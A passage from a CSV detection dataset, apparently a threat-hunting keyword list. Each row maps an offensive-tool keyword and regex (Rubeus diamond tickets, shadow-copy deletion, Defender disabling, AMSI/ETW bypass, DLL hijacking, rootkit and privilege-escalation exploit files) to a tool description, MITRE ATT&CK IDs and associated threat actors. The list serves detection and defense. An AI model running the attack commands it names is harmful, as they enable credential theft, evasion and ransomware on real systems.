Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","N/A","10","10","141","23","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z","817"
"* delete shadow copies from *c:/ *",".{0,1000}\sdelete\sshadow\scopies\sfrom\s.{0,1000}c\:\/\s.{0,1000}","offensive_tool_keyword","Inc","Inc ransomware","T1486 - T1490","TA0040","N/A","N/A","Ransomware","https://github.com/rivitna/Malware","1","0","#content","N/A","10","4","357","52","2025-04-22T10:00:56Z","2021-07-28T21:00:52Z","818"
"* deluge-rpc-brute.nse*",".{0,1000}\sdeluge\-rpc\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","819"
"* dementor.py*",".{0,1000}\sdementor\.py.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","N/A","10","9","842","113","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z","820"
"* demiguise.py*",".{0,1000}\sdemiguise\.py.{0,1000}","offensive_tool_keyword","demiguise","The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. and (if you use environmental keying) to avoid it being sandboxed.","T1564 - T1071.001 - T1071.004 - T1059 - T1070","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/nccgroup/demiguise","1","0","N/A","N/A","9","10","1389","257","2022-11-09T08:12:25Z","2017-07-26T08:56:15Z","821"
"* demon.x64.exe*",".{0,1000}\sdemon\.x64\.exe.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","822"
"* Dendron.exe*",".{0,1000}\sDendron\.exe.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/FuzzySecurity/Dendrobate","1","0","N/A","N/A","10","2","131","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z","823"
"* DenyOutboundFirewall.ahk*",".{0,1000}\sDenyOutboundFirewall\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","825"
"* deploy_cobalt_beacon*",".{0,1000}\sdeploy_cobalt_beacon.{0,1000}","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1059.001 - T1105 - T1071.001 - T1219 - T1573","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","0","N/A","N/A","10","10","750","156","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z","826"
"* DesertFox.go",".{0,1000}\sDesertFox\.go","offensive_tool_keyword","cobaltstrike","Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/zha0gongz1/DesertFox","1","0","N/A","N/A","10","10","125","26","2023-02-02T07:02:12Z","2021-02-04T09:04:13Z","827"
"* -DestHost * -DestPort 5555 -UseDefaultProxy*",".{0,1000}\s\-DestHost\s.{0,1000}\s\-DestPort\s5555\s\-UseDefaultProxy.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","BlackCat - Scattered Spider*","C2","https://github.com/Arno0x/DBC2","1","0","N/A","N/A","10","10","295","86","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z","828"
"* detect-hooks.c *",".{0,1000}\sdetect\-hooks\.c\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/anthemtotheego/Detect-Hooks","1","0","N/A","N/A","10","10","158","30","2021-07-22T20:13:16Z","2021-07-22T18:58:23Z","829"
"* dhcp_dns_update_utils.py*",".{0,1000}\sdhcp_dns_update_utils\.py.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","0","N/A","N/A","9","2","122","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z","830"
"* dhcp-discover.nse*",".{0,1000}\sdhcp\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","831"
"* dhcpd-noroute.conf*",".{0,1000}\sdhcpd\-noroute\.conf.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","0","N/A","N/A","9","2","132","17","2024-05-08T19:40:13Z","2024-03-11T22:24:56Z","832"
"* diagrun=true service=DNS* dllpath=*.dll* computername=*",".{0,1000}\sdiagrun\=true\sservice\=DNS.{0,1000}\sdllpath\=.{0,1000}\.dll.{0,1000}\scomputername\=.{0,1000}","offensive_tool_keyword","PerfExec","PerfExec - an example performance dll that will run CMD.exe and a .NET assembly that will execute the DLL or gather performance data locally or remotely.","T1055.001 - T1059.001 - T1059.003 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/PerfExec","1","0","N/A","N/A","7","1","77","12","2023-08-02T20:53:24Z","2023-07-11T16:43:47Z","833"
"* diamond * /certificate:*",".{0,1000}\sdiamond\s.{0,1000}\s\s\/certificate\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","834"
"* diamond /tgtdeleg *",".{0,1000}\sdiamond\s\/tgtdeleg\s.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","835"
"* diamond /user:*",".{0,1000}\sdiamond\s\/user\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","836"
"* diamorphine.c*",".{0,1000}\sdiamorphine\.c.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","#linux","N/A","10","10","1986","451","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z","837"
"* diamorphine.h*",".{0,1000}\sdiamorphine\.h.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","#linux","N/A","10","10","1986","451","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z","838"
"* dicom-brute.nse*",".{0,1000}\sdicom\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","839"
"* dicom-ping.nse*",".{0,1000}\sdicom\-ping\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","840"
"* dict-info.nse*",".{0,1000}\sdict\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","841"
"* DigitalOceanProxyTab.java*",".{0,1000}\sDigitalOceanProxyTab\.java.{0,1000}","offensive_tool_keyword","burpsuite","A BurpSuite extension to deploy an OpenVPN config file to DigitalOcean and set up a SOCKS proxy to route traffic through it","T1592 - T1021 - T1573 - T1090 - T1071","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/honoki/burp-digitalocean-openvpn-socks","1","0","N/A","N/A","10","1","49","9","2024-02-26T13:59:20Z","2024-02-26T13:59:17Z","842"
"* DInvokeResolver.*",".{0,1000}\sDInvokeResolver\..{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","843"
"* dirdevil.ps1*",".{0,1000}\sdirdevil\.ps1.{0,1000}","offensive_tool_keyword","dirdevil","PowerShell to hide data in directory structures","T1027 - T1083 - T1158 - T1059.001 - T1036","TA0005","N/A","N/A","Defense Evasion","https://github.com/nyxgeek/dirdevil","1","0","N/A","N/A","6","1","44","6","2024-07-11T16:09:02Z","2024-06-25T07:26:30Z","845"
"* dirdevil_decoder_mini.ps1*",".{0,1000}\sdirdevil_decoder_mini\.ps1.{0,1000}","offensive_tool_keyword","dirdevil","PowerShell to hide data in directory structures","T1027 - T1083 - T1158 - T1059.001 - T1036","TA0005","N/A","N/A","Defense Evasion","https://github.com/nyxgeek/dirdevil","1","0","N/A","N/A","6","1","44","6","2024-07-11T16:09:02Z","2024-06-25T07:26:30Z","846"
"* dirdevil_decoder_only.ps1*",".{0,1000}\sdirdevil_decoder_only\.ps1.{0,1000}","offensive_tool_keyword","dirdevil","PowerShell to hide data in directory structures","T1027 - T1083 - T1158 - T1059.001 - T1036","TA0005","N/A","N/A","Defense Evasion","https://github.com/nyxgeek/dirdevil","1","0","N/A","N/A","6","1","44","6","2024-07-11T16:09:02Z","2024-06-25T07:26:30Z","847"
"* --dirnames bank financ payable payment reconcil remit voucher vendor eft swift *",".{0,1000}\s\-\-dirnames\sbank\sfinanc\spayable\spayment\sreconcil\sremit\svoucher\svendor\seft\sswift\s.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","N/A","8","10","1117","138","2024-07-18T06:14:04Z","2020-03-18T13:27:20Z","848"
"* dirty.c *",".{0,1000}\sdirty\.c.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1533","TA0003","N/A","N/A","Exploitation tool","https://github.com/FireFart/dirtycow","1","0","N/A","N/A","N/A","9","884","428","2021-04-08T11:35:12Z","2016-11-25T21:08:01Z","849"
"* dirtycow.c *",".{0,1000}\sdirtycow\.c\s.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/timwr/CVE-2016-5195","1","0","N/A","N/A","N/A","10","972","393","2021-02-03T16:03:40Z","2016-10-21T11:19:21Z","850"
"* Dirty-Pipe.*",".{0,1000}\sDirty\-Pipe\..{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/bbaranoff/CVE-2022-0847","1","0","N/A","N/A","N/A","1","49","25","2022-03-07T15:52:23Z","2022-03-07T15:50:18Z","851"
"* Dirty-Pipe.sh*",".{0,1000}\sDirty\-Pipe\.sh.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/puckiestyle/CVE-2022-0847","1","0","N/A","N/A","N/A","1","2","1","2022-03-10T08:10:40Z","2022-03-08T14:46:21Z","852"
"* Disable_defender.py*",".{0,1000}\sDisable_defender\.py.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","853"
"* DisableAntiSpyware 1 -Type Dword -Force -ea 0*",".{0,1000}\sDisableAntiSpyware\s1\s\-Type\sDword\s\-Force\s\-ea\s0.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#registry","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","854"
"* --disable-bypass-amsi*",".{0,1000}\s\-\-disable\-bypass\-amsi.{0,1000}","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point exection","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","0","N/A","N/A","10","10","1140","160","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z","855"
"* --disable-bypass-cmdline*",".{0,1000}\s\-\-disable\-bypass\-cmdline.{0,1000}","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point exection","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","0","N/A","N/A","10","10","1140","160","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z","856"
"* --disable-bypass-etw*",".{0,1000}\s\-\-disable\-bypass\-etw.{0,1000}","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point exection","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","0","N/A","N/A","10","10","1140","160","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z","857"
"* DisableETW(*",".{0,1000}\sDisableETW\(.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1071.001 - T1059 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1562.001 - T1070 - T1105 - T1106 - T1027 - T1027.002 - T1057 - T1055 - T1620","TA0011 - TA0002 - TA0005 - TA0008 - TA0004 - TA0007 - TA0003 - TA0006 - TA0010","N/A","Indrik Spider","Exploitation tool","https://github.com/TheWover/donut","1","0","N/A","N/A","N/A","10","3882","667","2024-10-23T12:19:13Z","2019-03-27T23:24:44Z","858"
"* DisableWLDP(*",".{0,1000}\sDisableWLDP\(.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1071.001 - T1059 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1562.001 - T1070 - T1105 - T1106 - T1027 - T1027.002 - T1057 - T1055 - T1620","TA0011 - TA0002 - TA0005 - TA0008 - TA0004 - TA0007 - TA0003 - TA0006 - TA0010","N/A","Indrik Spider","Exploitation tool","https://github.com/TheWover/donut","1","0","N/A","N/A","N/A","10","3882","667","2024-10-23T12:19:13Z","2019-03-27T23:24:44Z","859"
"* distcc-cve2004-2687.nse*",".{0,1000}\sdistcc\-cve2004\-2687\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","860"
"* --distribution kali-linux*",".{0,1000}\s\-\-distribution\skali\-linux.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","N/A","1","0","N/A","wsl.exe argument kali os","10","10","N/A","N/A","N/A","N/A","861"
"* DLHell.py*",".{0,1000}\sDLHell\.py.{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","0","N/A","N/A","9","2","163","24","2024-06-17T16:20:10Z","2024-04-17T13:00:12Z","862"
"* --dll * --only *AmsiScanBuffer*AmsiScanString*",".{0,1000}\s\-\-dll\s.{0,1000}\s\-\-only\s.{0,1000}AmsiScanBuffer.{0,1000}AmsiScanString.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","N/A","10","10","1037","141","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z","863"
"* --dll * --payload *",".{0,1000}\s\-\-dll\s.{0,1000}\s\-\-payload\s.{0,1000}","offensive_tool_keyword","SharpDllProxy","Retrieves exported functions from a legitimate DLL and generates a proxy DLL source code/template for DLL proxy loading or sideloading","T1036 - T1036.005 - T1070 - T1070.004 - T1071 - T1574.002","TA0002 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Flangvik/SharpDllProxy","1","0","N/A","N/A","N/A","8","792","102","2020-07-21T17:14:01Z","2020-07-12T10:46:48Z","864"
"* -dll add_user.dll -dir *",".{0,1000}\s\-dll\sadd_user\.dll\s\-dir\s.{0,1000}","offensive_tool_keyword","SpoolFool","Exploit for CVE-2022-21999 - Windows Print Spooler Elevation of Privilege Vulnerability (LPE)","T1068 - T1055 - T1059.003","TA0004 - TA0005 - TA0003","","Dispossessor","Privilege Escalation","https://github.com/ly4k/SpoolFool","1","0","N/A","N/A","9","8","788","160","2022-02-09T16:54:09Z","2022-02-08T17:25:44Z","865"
"* -dll add_user.dll -printer *",".{0,1000}\s\-dll\sadd_user\.dll\s\-printer\s.{0,1000}","offensive_tool_keyword","SpoolFool","Exploit for CVE-2022-21999 - Windows Print Spooler Elevation of Privilege Vulnerability (LPE)","T1068 - T1055 - T1059.003","TA0004 - TA0005 - TA0003","","Dispossessor","Privilege Escalation","https://github.com/ly4k/SpoolFool","1","0","N/A","N/A","9","8","788","160","2022-02-09T16:54:09Z","2022-02-08T17:25:44Z","866"
"* --dll C:\Windows\System32\version.dll*--dll C:\Windows\System32\userenv.dll*",".{0,1000}\s\-\-dll\sC\:\\Windows\\System32\\version\.dll.{0,1000}\-\-dll\sC\:\\Windows\\System32\\userenv\.dll.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","N/A","10","10","1037","141","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z","867"
"* --dll --dllhijack *",".{0,1000}\s\-\-dll\s\-\-dllhijack\s.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","N/A","private github repo","10","","N/A","","","","868"
"* DLLHound.ps1*",".{0,1000}\sDLLHound\.ps1.{0,1000}","offensive_tool_keyword","DLLHound","Find potential DLL Sideloads on your windows computer","T1574.001 - T1574.002","TA0004 - TA0007","N/A","N/A","Discovery","https://github.com/ajm4n/DLLHound","1","0","N/A","N/A","7","3","201","22","2025-01-12T02:28:22Z","2024-12-20T02:26:16Z","869"
"* dllinject.py*",".{0,1000}\sdllinject\.py.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","870"
"* dllinjection_rs.exe*",".{0,1000}\sdllinjection_rs\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","871"
